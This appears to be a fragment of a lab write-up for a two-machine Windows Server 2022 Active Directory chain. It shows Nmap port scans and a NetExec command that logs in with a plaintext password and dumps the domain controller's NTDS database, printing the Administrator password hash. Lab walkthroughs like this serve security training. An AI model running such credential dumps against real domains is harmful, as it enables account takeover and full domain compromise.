Operating System: Microsoft Windows Server 2022 Standard
Chain: True (2 Machines)
Credentials
Username
Password
Method
Scope
✅ Valid Usernames
🔑 Passwords list
Information Gathering
Nmap
Nmap scan report for 10.10.187.181
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack ttl 127
135/tcp open tcpwrapped syn-ack ttl 127
139/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
593/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open tcpwrapped syn-ack ttl 127
Nmap scan report for 10.10.187.182
PORT STATE SERVICE REASON VERSION
80/tcp open tcpwrapped syn-ack ttl 127
135/tcp open tcpwrapped syn-ack ttl 127
139/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open tcpwrapped syn-ack ttl 127
nxc smb 10.10.170.85 -u 'Intrusionz3r0' -p 'P@assword123' --ntds --user Administrator
SMB 10.10.170.85 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB 10.10.170.85 445 DC [+] tea.vl\Intrusionz3r0:P@assword123 (Pwn3d!)
SMB 10.10.170.85 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.170.85 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:c98bef04d073b4607daee561364ff612:::